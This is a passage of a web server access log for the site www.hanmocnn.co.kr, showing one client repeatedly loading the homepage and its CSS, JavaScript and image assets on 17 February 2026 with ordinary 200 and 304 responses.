+0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:20:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:20:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10403] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:35:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:44:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:47:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10418] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:48:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10423] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] 